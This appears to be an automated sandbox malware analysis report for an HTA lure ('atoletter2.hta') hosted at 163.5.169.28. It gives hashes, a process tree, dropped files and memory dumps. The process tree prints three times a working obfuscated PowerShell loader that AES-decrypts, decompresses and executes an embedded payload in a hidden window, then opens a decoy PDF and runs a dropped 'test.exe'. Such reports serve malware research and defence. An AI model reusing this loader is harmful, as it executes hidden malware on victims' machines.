Overview

overview

10

Static

static

10

163.5.169....r2.hta

windows7-x64

3

163.5.169....r2.hta

windows10-2004-x64

8

163.5.169....r2.pdf

windows7-x64

1

163.5.169....r2.pdf

windows10-2004-x64

1

163.5.169....r3.hta

windows7-x64

3

163.5.169....r3.hta

windows10-2004-x64

10

163.5.169....r3.pdf

windows7-x64

1

163.5.169....r3.pdf

windows10-2004-x64

1

163.5.169....r4.hta

windows7-x64

3

163.5.169....r4.hta

windows10-2004-x64

7

163.5.169....r4.pdf

windows7-x64

1

163.5.169....r4.pdf

windows10-2004-x64

1

163.5.169....r5.hta

windows7-x64

3

163.5.169....r5.hta

windows10-2004-x64

10

163.5.169....r5.pdf

windows7-x64

1

163.5.169....r5.pdf

windows10-2004-x64

1

163.5.169....r2.hta

windows7-x64

3

163.5.169....r2.hta

windows10-2004-x64

7

163.5.169....er.hta

windows7-x64

3

163.5.169....er.hta

windows10-2004-x64

8

163.5.169....r2.hta

windows7-x64

3

163.5.169....r2.hta

windows10-2004-x64

1

163.5.169....ry.gif

windows7-x64

1

163.5.169....ry.gif

windows10-2004-x64

1

163.5.169....nk.gif

windows7-x64

1

163.5.169....nk.gif

windows10-2004-x64

1

163.5.169.28/cmd.exe

windows7-x64

163.5.169.28/cmd.exe

windows10-2004-x64

1

163.5.169.28/cmt.exe

windows7-x64

1

163.5.169.28/cmt.exe

windows10-2004-x64

1

163.5.169.28/fd1.exe

windows7-x64

10

163.5.169.28/fd1.exe

windows10-2004-x64

10

Resubmissions

21-01-2025 11:24

250121-nh1zvs1qak 10

10-01-2024 21:28

240110-1ba63sgfdp 10

Analysis

  • max time kernel
    0s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2024 21:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    163.5.169.28/atoletter2.hta

  • Size

    1.1MB

  • MD5

    3aa22e06354205638a0560dfd95ba73d

  • SHA1

    bd77bf64a070a8f233197e2db3cdef0879cc446d

  • SHA256

    8867f18c416e402fa6c470e2fa207e2ff1809b69a450356bd8a8c854edea4dd5

  • SHA512

    ce75e12481f9840666fc783bed155779d75845e0b81f5679dd5ea801ad359527b389b611ca11eda321fb28d77dc10089ebf073c41aa00e51b921ea0cc1c28b8b

  • SSDEEP

    1536:qb0rlgqoroRgFUnAFzUbVlt9Ci5namr/l1vcmafSIm+lIWFjBoOuqpd2eWSFU4ww:qb0rlmrkgFUnAFgbVLFnG

Score
1/10

Malware Config

Signatures

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\atoletter2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
      PID:2428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp | powershell - }
        2⤵
          PID:3504
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp | powershell -
            3⤵
              PID:4940
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          1⤵
            PID:964
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\SCAN-atoletter2.pdf"
              2⤵
                PID:948
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                  3⤵
                    PID:5048
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EED809595A7A8ADECCC94FDE2500E69B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EED809595A7A8ADECCC94FDE2500E69B --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
                      4⤵
                        PID:4708
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0D7AF6EA4E9F080E935725EC90C48412 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        4⤵
                          PID:4356
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EC2DF248BF42CB1DEE289C2FE926E4D5 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          4⤵
                            PID:4656
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1831BC09850907EE86726ADB5F500D61 --mojo-platform-channel-handle=2424 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            4⤵
                              PID:4248
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=5002D0952688EFEBCC5329DBD14796E7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=5002D0952688EFEBCC5329DBD14796E7 --renderer-client-id=6 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job /prefetch:1
                              4⤵
                                PID:1856
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AB2AB4AB4EBAA54A5DDAA7F043FAB5F7 --mojo-platform-channel-handle=2660 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                4⤵
                                  PID:3400
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp
                            1⤵
                              PID:2708
                            • C:\Users\Admin\AppData\Roaming\test.exe
                              C:\Users\Admin\AppData\Roaming\test.exe
                              1⤵
                                PID:3940

                              Network

                              MITRE ATT&CK Matrix

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                3KB

                                MD5

                                54a39c3bcef68c31cbf509e16392681e

                                SHA1

                                67d6d6f744b5e76ba6641591924cb1976b8814f0

                                SHA256

                                2d9ce535ca19bb08013cb806138b93a80d587ff6a57ef67c0e9557719f92d8ba

                                SHA512

                                52a3d10df9616907e21eb65745810cfa28a438eacabebd6d8247c80ffaff930b2098e5755d52af62a6cfa42fcb2aedb3e01a408c6f83ab2c74f75c79746ce652

                                Download Submit

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                1KB

                                MD5

                                d0df5f9974138501424cb06472477adf

                                SHA1

                                9d143e2c9c48327c6fa0b4f2fb65be982037db51

                                SHA256

                                6c3615c908cb98afc062e70b7f985bf7b667fd8540a25824aa07a14b6b6a05d6

                                SHA512

                                9a7d8b47a8311e00ba206fee9bf0d42991a0caaf43492ea067bb6c9eb333a3231a35bae1efcd95add82d6dbfcfef5e10d42c084b9e73c5fdd7eadf8131324617

                                Download Submit

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                Filesize

                                56KB

                                MD5

                                cfb107bd5a858f713a5b27ffffc3fe2c

                                SHA1

                                2719185694ba02b41fa9cfc44675decd659a02e5

                                SHA256

                                238bd4ca398dea2caf92c2977b29aa05d1cc9a283728c374416ea1781e252305

                                SHA512

                                08b38538d4c3c219cd8f83e915988e44c2399de71e09804b49c2f0b0083cde275461aa31fd83e1d7a99c8b47619d83fd9262d4f19106a7ea4f44b6dbc408222f

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                Filesize

                                1KB

                                MD5

                                def65711d78669d7f8e69313be4acf2e

                                SHA1

                                6522ebf1de09eeb981e270bd95114bc69a49cda6

                                SHA256

                                aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                SHA512

                                05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                15KB

                                MD5

                                01b972316a1d66603d66648d3b2029a4

                                SHA1

                                9ac5f3faa7f16105bc60c31380aba0fc07a82632

                                SHA256

                                74ab9df229d9d4f3cb99f1241c3a3a41bc95117af5450045080e65de0413a99a

                                SHA512

                                c76103d2b0d6c1453b40d9dfebc9b39b2da767ba0e92437b3d6ad10d5a39571897dba10386b2a9f384b4895376dccc609413cee8db035b8f071ff9dd7c1dafb7

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kllf4oa2.2ce.ps1
                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                Download Submit

                              • C:\Users\Admin\AppData\Roaming\test.exe
                                Filesize

                                2KB

                                MD5

                                d7358afa2f8b65389d8b0901a6ac83ec

                                SHA1

                                c15a0afc7805011dd92f669edf3006c6b6b8fa24

                                SHA256

                                063f0b674ea88b107239ca05166f58613b66bf4a00f1361463e877e93a75e348

                                SHA512

                                001ab4d1549a5be604f60058e6db57e0a01154ea3eac67eb6be7ab5eea837d6d208e7055112bfb003f7281787ac1c21ddb0cf00f233ad635b313ed4cdc13dfd8

                                Download Submit

                              • C:\Users\Admin\AppData\Roaming\test.exe
                                Filesize

                                8KB

                                MD5

                                dc0d40579447b035d980cf0b8cd7667c

                                SHA1

                                c907f983cb27d5caec6c941e0712afcc973487d0

                                SHA256

                                36ed94fb9f8ef3f5cbf8494ff6400d0be353ae7c223ed209bd85d466d1ba1ff7

                                SHA512

                                ed37522b52b617877b5e5f7023a0138baf396c0b33393d6155dbb6bfa4b3347b737e5493cbde634fa1937d0094a7b9b543929e6f32b35331a8c6dc838f38d51b

                                Download Submit

                              • C:\Users\Admin\SCAN-atoletter2.pdf
                                Filesize

                                25KB

                                MD5

                                93b234ae4d0fdb2d51d402e2c056c58a

                                SHA1

                                1a4ba792ddfab8a6793530c400f29bf7f728f6c6

                                SHA256

                                20fb4fedb150667bf251d5ed911a4d280e6246e36ed5e9115f77b781644cde82

                                SHA512

                                641facc3bf8aeb11895fec213503c68e5854de8048421ef82d740d7966bdd2155f3edf5c906bd92c2f4c087ae91702b30a6bce88148b74752a8f290a8f2233ef

                                Download Submit

                              • memory/948-225-0x000000000BFC0000-0x000000000C26B000-memory.dmp

                                Filesize

                                2.7MB

                                Download

                              • memory/964-78-0x00000000087E0000-0x00000000087F1000-memory.dmp

                                Filesize

                                68KB

                                Download

                              • memory/964-60-0x000000007FCA0000-0x000000007FCB0000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/964-54-0x00000000074E0000-0x0000000007524000-memory.dmp

                                Filesize

                                272KB

                                Download

                              • memory/964-73-0x0000000008690000-0x00000000086AE000-memory.dmp

                                Filesize

                                120KB

                                Download

                              • memory/964-75-0x00000000086F0000-0x0000000008793000-memory.dmp

                                Filesize

                                652KB

                                Download

                              • memory/964-77-0x00000000087D0000-0x00000000087DA000-memory.dmp

                                Filesize

                                40KB

                                Download

                              • memory/964-61-0x00000000086B0000-0x00000000086E2000-memory.dmp

                                Filesize

                                200KB

                                Download

                              • memory/964-62-0x000000006E3E0000-0x000000006E42C000-memory.dmp

                                Filesize

                                304KB

                                Download

